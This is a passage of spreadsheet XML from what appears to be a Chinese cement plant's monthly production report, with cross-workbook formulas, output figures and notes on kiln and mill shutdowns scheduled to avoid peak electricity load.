        <f>[16]调整表!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>[16]调整表!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>[16]调整表!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>[16]调整表!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>[16]调整表!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'31'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'31'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]30'!$Q$62</f>
        <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：8:00-24:00避峰停机；2#磨：11:20-24:00避峰停机；3#磨：8:00-24:00避峰停机；4#磨：8:00-24:00避峰停机。</v>
      </c>
      <c r="R56" s="261"/>
      <c r="S56" s="261"/>
      <c r="T56" s="261"/>
      <c r="U56" s="261"/>
      <c r="V56" s="261"/>
      <c r="W56" s="261"/>
      <c r="X56" s="261"/>
      <c r="Y56" s="261"/>
      <c r="Z56" s="262"/>
    </row>
    <row r="57" ht="15.75" customHeight="1" spans="1:26">
      <c r="A57" s="191"/>
      <c r="B57" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C57" s="193"/>
      <c r="D57" s="193"/>
      <c r="E57" s="194">
        <v>160000</v>
      </c>
      <c r="F57" s="194"/>
      <c r="G57" s="225"/>
      <c r="H57" s="194">
        <f>G57+'31'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'31'!K57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G58+'31'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'31'!K58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G59+'31'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'31'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]30'!$Q$65</f>
        <v>窑:错峰续停。A组磨：8:00-24:00避峰停机。D1#磨：8:00-24:00避峰停机，D2#磨：8:00-24:00避峰停机。</v>
      </c>
      <c r="R59" s="272"/>
      <c r="S59" s="272"/>
      <c r="T59" s="272"/>
      <c r="U59" s="272"/>
      <c r="V59" s="272"/>
      <c r="W59" s="272"/>
      <c r="X59" s="272"/>
      <c r="Y59" s="272"/>
      <c r="Z59" s="273"/>
    </row>
    <row r="60" ht="15.75" customHeight="1" spans="1:26">
      <c r="A60" s="191"/>
      <c r="B60" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C60" s="193"/>
      <c r="D60" s="193"/>
      <c r="E60" s="194"/>
      <c r="F60" s="194"/>
      <c r="G60" s="225"/>
      <c r="H60" s="194">
        <f>G60+'31'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'31'!K60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[14]调整表!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>[14]调整表!$E$6</f>
        <v>0</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'31'!H61</f>
        <v>122026</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1237899</v>
      </c>
      <c r="J61" s="194">
        <f>[14]调整表!$E$21</f>
        <v>0</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'31'!K61</f>
        <v>122182</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1223342.08</v>
      </c>
      <c r="M61" s="194">
        <f>[14]调整表!$H$6</f>
        <v>37613.1699999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>72.333019230769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[14]调整表!$M$11+[14]调整表!$M$12+[14]调整表!$M$13+[14]调整表!$M$14+[14]调整表!$M$15+[14]调整表!$M$16+[14]调整表!$M$17+[14]调整表!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>[14]调整表!$N$11+[14]调整表!$N$12+[14]调整表!$N$13+[14]调整表!$N$14+[14]调整表!$N$15+[14]调整表!$N$16+[14]调整表!$N$17+[14]调整表!$N$18</f>
        <v>3843.228</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'31'!H62</f>
        <v>89402.228</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>925395.684</v>
      </c>
      <c r="J62" s="194">
        <f>[14]调整表!$Q$11+[14]调整表!$Q$12+[14]调整表!$Q$13+[14]调整表!$Q$14+[14]调整表!$Q$15+[14]调整表!$Q$16+[14]调整表!$Q$17+[14]调整表!$Q$18</f>
        <v>0</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'31'!K62</f>
        <v>87861</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>922333.796</v>
      </c>
      <c r="M62" s="194">
        <f>[14]调整表!$T$11+[14]调整表!$T$12+[14]调整表!$T$13+[14]调整表!$T$14+[14]调整表!$T$15+[14]调整表!$T$16+[14]调整表!$T$17+[14]调整表!$T$18</f>
        <v>19995.862</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>79.9834479999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]30'!$Q$71</f>
        <v>窑:续停。水泥磨:10：00-24：00避峰停机。</v>
      </c>
      <c r="R62" s="272"/>
      <c r="S62" s="272"/>
      <c r="T62" s="272"/>
      <c r="U62" s="272"/>
      <c r="V62" s="272"/>
      <c r="W62" s="272"/>
      <c r="X62" s="272"/>
      <c r="Y62" s="272"/>
      <c r="Z62" s="273"/>
    </row>
    <row r="63" ht="15.75" customHeight="1" spans="1:26">
      <c r="A63" s="191"/>
      <c r="B63" s="193"/>
      <c r="C63" s="193"/>
      <c r="D63" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E63" s="194"/>
      <c r="F63" s="194">
        <f>[14]调整表!$M$19+[14]调整表!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>[14]调整表!$N$19+[14]调整表!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'31'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>[14]调整表!$Q$19+[14]调整表!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'31'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>[14]调整表!$T$19+[14]调整表!$T$20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G64+'31'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'31'!K64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G65+'31'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'31'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]30'!$Q$74</f>
        <v>1#窑:续停；2#窑:正常；1#磨:14:30-22:30避峰停机。2#磨:14:30-23:20避峰停机。3#磨:14:30-22:30避峰停机。</v>
      </c>
      <c r="R65" s="272"/>
      <c r="S65" s="272"/>
      <c r="T65" s="272"/>
      <c r="U65" s="272"/>
      <c r="V65" s="272"/>
      <c r="W65" s="272"/>
      <c r="X65" s="272"/>
      <c r="Y65" s="272"/>
      <c r="Z65" s="273"/>
    </row>
    <row r="66" ht="15.75" customHeight="1" spans="1:26">
      <c r="A66" s="191"/>
      <c r="B66" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C66" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D66" s="193"/>
      <c r="E66" s="194"/>
      <c r="F66" s="194"/>
      <c r="G66" s="194"/>
      <c r="H66" s="194">
        <f>G66+'31'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'31'!K66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G67+'31'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'31'!K67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[15]调整表!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>[15]调整表!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'31'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>[15]调整表!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'31'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>[15]调整表!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]30'!$Q$77</f>
        <v>1#磨14:30-24:00避峰停机:9.5小时(避峰)。2#磨运行正常。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>[15]调整表!$D$43+[15]调整表!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>[15]调整表!$E$43+[15]调整表!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'31'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>[15]调整表!$H$43+[15]调整表!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'31'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>[15]调整表!$K$43+[15]调整表!$K$44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[15]调整表!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>[15]调整表!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'31'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>[15]调整表!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'31'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>[15]调整表!$K$45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G71+'31'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'31'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]30'!$Q$80</f>
        <v>水泥磨:00：00-24:00续停机。</v>
      </c>
      <c r="R71" s="272"/>
      <c r="S71" s="272"/>
      <c r="T71" s="272"/>
      <c r="U71" s="272"/>
      <c r="V71" s="272"/>
      <c r="W71" s="272"/>
      <c r="X71" s="272"/>
      <c r="Y71" s="272"/>
      <c r="Z71" s="273"/>
    </row>
    <row r="72" ht="15.75" customHeight="1" spans="1:26">
      <c r="A72" s="191"/>
      <c r="B72" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C72" s="193"/>
      <c r="D72" s="193"/>
      <c r="E72" s="194">
        <v>0</v>
      </c>
      <c r="F72" s="194"/>
      <c r="G72" s="194"/>
      <c r="H72" s="194">
        <f>G72+'31'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'31'!K72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G73+'31'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'31'!K73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G74+'31'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'31'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]30'!$Q$83</f>
        <v>2#磨：续停。</v>
      </c>
      <c r="R74" s="272"/>
      <c r="S74" s="272"/>
      <c r="T74" s="272"/>
      <c r="U74" s="272"/>
      <c r="V74" s="272"/>
      <c r="W74" s="272"/>
      <c r="X74" s="272"/>
      <c r="Y74" s="272"/>
      <c r="Z74" s="273"/>
    </row>
    <row r="75" ht="15.75" customHeight="1" spans="1:26">
      <c r="A75" s="282" t="s">
        <v>287</v>
      </c>
      <c r="B75" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C75" s="193"/>
      <c r="D75" s="193"/>
      <c r="E75" s="241"/>
      <c r="F75" s="241"/>
      <c r="G75" s="241"/>
      <c r="H75" s="194">
        <f>G75+'31'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'31'!K75</f>
        <v>0</v>
      </c>
      <c r="L75" s="194">
        <f>K75+yc!L75</f>
        <v>0</v>
      </c>
      <c r="M75" s="241"/>
      <c r="N75" s="241"/>
      <c r="O75" s="263"/>
      <c r="P75" s="283"/>
      <c r="Q75" s="265"/>
      <c r="R75" s="266"/>
      <c r="S75" s="266"/>
      <c r="T75" s="266"/>
      <c r="U75" s="266"/>
      <c r="V75" s="266"/>
      <c r="W75" s="266"/>
      <c r="X75" s="266"/>
      <c r="Y75" s="266"/>
      <c r="Z75" s="267"/>
    </row>
    <row r="76" ht="15.75" customHeight="1" spans="1:26">
      <c r="A76" s="287"/>
      <c r="B76" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C76" s="193"/>
      <c r="D76" s="193"/>
      <c r="E76" s="241"/>
      <c r="F76" s="241"/>
      <c r="G76" s="241"/>
      <c r="H76" s="194">
        <f>G76+'31'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'31'!K76</f>
        <v>0</v>
      </c>
      <c r="L76" s="194">
        <f>K76+yc!L76</f>
        <v>0</v>
      </c>
      <c r="M76" s="241"/>
      <c r="N76" s="241"/>
      <c r="O76" s="263"/>
      <c r="P76" s="288"/>
      <c r="Q76" s="268"/>
      <c r="R76" s="269"/>
      <c r="S76" s="269"/>
      <c r="T76" s="269"/>
      <c r="U76" s="269"/>
      <c r="V76" s="269"/>
      <c r="W76" s="269"/>
      <c r="X76" s="269"/>
      <c r="Y76" s="269"/>
      <c r="Z76" s="270"/>
    </row>
    <row r="77" ht="15.75" customHeight="1" spans="1:26">
      <c r="A77" s="287"/>
      <c r="B77" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C77" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D77" s="193"/>
      <c r="E77" s="241"/>
      <c r="F77" s="241"/>
      <c r="G77" s="241"/>
      <c r="H77" s="194">
        <f>G77+'31'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'31'!K77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G78+'31'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'31'!K78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[16]调整表!$E$7</f>
        <v>0</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'31'!H79</f>
        <v>16177.78</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>163306.25</v>
      </c>
      <c r="J79" s="301">
        <f>[16]调整表!$I$7</f>
        <v>0</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'31'!K79</f>
        <v>15171.5</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>157062.95</v>
      </c>
      <c r="M79" s="301">
        <f>[16]调整表!$L$7</f>
        <v>5891.06</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>11.78212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[16]调整表!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'31'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>[16]调整表!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'31'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>[16]调整表!$Y$15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G81+'31'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'31'!K81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G82+'31'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'31'!K82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G83+'31'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'31'!K83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G84+'31'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'31'!K84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G85+'31'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'31'!K85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58"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="4" ySplit="4" topLeftCell="E44" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="H51" sqref="H51"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="5.625" defaultRowHeight="12"/>
  <cols>
    <col min="1" max="1" width="2.875" style="172" customWidth="1"/>
    <col min="2" max="2" width="4.625" style="172" customWidth="1"/>
    <col min="3" max="3" width="5.375" style="172" customWidth="1"/>
    <col min="4" max="4" width="8.75" style="172" customWidth="1"/>
    <col min="5" max="14" width="9.125" style="172" customWidth="1"/>
    <col min="15" max="15" width="3.375" style="172" customWidth="1"/>
    <col min="16" max="16" width="8.875" style="172" customWidth="1"/>
    <col min="17" max="17" width="9" style="172" customWidth="1"/>
    <col min="18" max="18" width="9.625" style="172" customWidth="1"/>
    <col min="19" max="19" width="9.625" style="173" customWidth="1"/>
    <col min="20" max="20" width="8.875" style="173" customWidth="1"/>
    <col min="21" max="25" width="8.5" style="173" customWidth="1"/>
    <col min="26" max="26" width="9.75" style="173" customWidth="1"/>
    <col min="27" max="16384" width="5.625" style="172"/>
  </cols>
  <sheetData>
    <row r="1" ht="22.5" spans="1:26">
      <c r="A1" s="174" t="s">
        <v>289</v>
      </c>
      <c r="B1" s="174"/>
      <c r="C1" s="174"/>
      <c r="D1" s="174"/>
      <c r="E1" s="174"/>
      <c r="F1" s="174"/>
      <c r="G1" s="174"/>
      <c r="H1" s="174"/>
      <c r="I1" s="174"/>
      <c r="J1" s="174"/>
      <c r="K1" s="174"/>
      <c r="L1" s="174"/>
      <c r="M1" s="174"/>
      <c r="N1" s="174"/>
      <c r="O1" s="174"/>
      <c r="P1" s="174"/>
      <c r="Q1" s="174"/>
      <c r="R1" s="174"/>
      <c r="S1" s="174"/>
      <c r="T1" s="174"/>
      <c r="U1" s="174"/>
      <c r="V1" s="174"/>
      <c r="W1" s="174"/>
      <c r="X1" s="174"/>
      <c r="Y1" s="174"/>
      <c r="Z1" s="174"/>
    </row>
    <row r="2" ht="14.25" customHeight="1" spans="1:26">
      <c r="A2" s="175" t="s">
        <v>207</v>
      </c>
      <c r="B2" s="176"/>
      <c r="C2" s="176"/>
      <c r="D2" s="176"/>
      <c r="E2" s="177" t="s">
        <v>208</v>
      </c>
      <c r="F2" s="178"/>
      <c r="G2" s="177"/>
      <c r="H2" s="177"/>
      <c r="I2" s="179">
        <f>31/31</f>
        <v>1</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182" t="s">
        <v>333</v>
      </c>
      <c r="O2" s="182"/>
      <c r="P2" s="182"/>
      <c r="Q2" s="183"/>
      <c r="R2" s="184"/>
      <c r="S2" s="184"/>
      <c r="T2" s="184"/>
      <c r="U2" s="184"/>
      <c r="V2" s="184"/>
      <c r="X2" s="185"/>
      <c r="Y2" s="186"/>
      <c r="Z2" s="187" t="s">
        <v>210</v>
      </c>
    </row>
    <row r="3" s="171" customFormat="1" spans="1:26">
      <c r="A3" s="188" t="s">
        <v>211</v>
      </c>
      <c r="B3" s="188"/>
      <c r="C3" s="188"/>
      <c r="D3" s="188"/>
      <c r="E3" s="189" t="s">
        <v>212</v>
      </c>
      <c r="F3" s="189" t="s">
        <v>213</v>
      </c>
      <c r="G3" s="189" t="s">
        <v>214</v>
      </c>
      <c r="H3" s="189" t="s">
        <v>215</v>
      </c>
      <c r="I3" s="189" t="s">
        <v>216</v>
      </c>
      <c r="J3" s="189" t="s">
        <v>217</v>
      </c>
      <c r="K3" s="189" t="s">
        <v>215</v>
      </c>
      <c r="L3" s="189" t="s">
        <v>216</v>
      </c>
      <c r="M3" s="189" t="s">
        <v>218</v>
      </c>
      <c r="N3" s="190" t="s">
        <v>219</v>
      </c>
      <c r="O3" s="191" t="s">
        <v>211</v>
      </c>
      <c r="P3" s="191"/>
      <c r="Q3" s="191"/>
      <c r="R3" s="192" t="s">
        <v>220</v>
      </c>
      <c r="S3" s="192"/>
      <c r="T3" s="192"/>
      <c r="U3" s="192" t="s">
        <v>221</v>
      </c>
      <c r="V3" s="192"/>
      <c r="W3" s="192"/>
      <c r="X3" s="192" t="s">
        <v>222</v>
      </c>
      <c r="Y3" s="192"/>
      <c r="Z3" s="192"/>
    </row>
    <row r="4" spans="1:26">
      <c r="A4" s="188"/>
      <c r="B4" s="188"/>
      <c r="C4" s="188"/>
      <c r="D4" s="188"/>
      <c r="E4" s="189"/>
      <c r="F4" s="189"/>
      <c r="G4" s="189"/>
      <c r="H4" s="189"/>
      <c r="I4" s="189"/>
      <c r="J4" s="189"/>
      <c r="K4" s="189"/>
      <c r="L4" s="189"/>
      <c r="M4" s="189"/>
      <c r="N4" s="190"/>
      <c r="O4" s="191"/>
      <c r="P4" s="191"/>
      <c r="Q4" s="191"/>
      <c r="R4" s="193" t="s">
        <v>223</v>
      </c>
      <c r="S4" s="193" t="s">
        <v>224</v>
      </c>
      <c r="T4" s="193" t="s">
        <v>225</v>
      </c>
      <c r="U4" s="193" t="s">
        <v>223</v>
      </c>
      <c r="V4" s="193" t="s">
        <v>224</v>
      </c>
      <c r="W4" s="193" t="s">
        <v>225</v>
      </c>
      <c r="X4" s="193" t="s">
        <v>223</v>
      </c>
      <c r="Y4" s="193" t="s">
        <v>224</v>
      </c>
      <c r="Z4" s="193" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="5" ht="15.75" customHeight="1" spans="1:26">
      <c r="A5" s="191" t="s">
        <v>226</v>
      </c>
      <c r="B5" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C5" s="193"/>
      <c r="D5" s="193"/>
      <c r="E5" s="194">
        <f>E21+E31+E41+E51+E61+E68+E79</f>
        <v>650000</v>
      </c>
      <c r="F5" s="194">
        <f>F21+F31+F41+F51+F61+F68+F79</f>
        <v>262736.854</v>
      </c>
      <c r="G5" s="194">
        <f>G21+G31+G41+G51+G61+G68+G79</f>
        <v>0</v>
      </c>
      <c r="H5" s="194">
        <f>G5+调整表!H5</f>
        <v>652162.78</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6807028.81</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>0</v>
      </c>
      <c r="K5" s="194">
        <f>J5+调整表!K5</f>
        <v>715921.065</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6865992.196</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>203709.539</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>54.4677911764705</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>[10]月报!$W$101</f>
        <v>0</v>
      </c>
      <c r="S5" s="198">
        <f>[10]月报!$X$101</f>
        <v>271.294167565063</v>
      </c>
      <c r="T5" s="198">
        <f>[10]月报!$Y$101</f>
        <v>260.421411059556</v>
      </c>
      <c r="U5" s="198">
        <f>[10]月报!$T$101</f>
        <v>0</v>
      </c>
      <c r="V5" s="198">
        <f>[10]月报!$U$101</f>
        <v>31.0439516129032</v>
      </c>
      <c r="W5" s="198">
        <f>[10]月报!$V$101</f>
        <v>61.8069178082192</v>
      </c>
      <c r="X5" s="198">
        <f>[10]月报!$Q$101</f>
        <v>0</v>
      </c>
      <c r="Y5" s="198">
        <f>[10]月报!$R$101</f>
        <v>230.967</v>
      </c>
      <c r="Z5" s="198">
        <f>[10]月报!$S$101</f>
        <v>5414.286</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
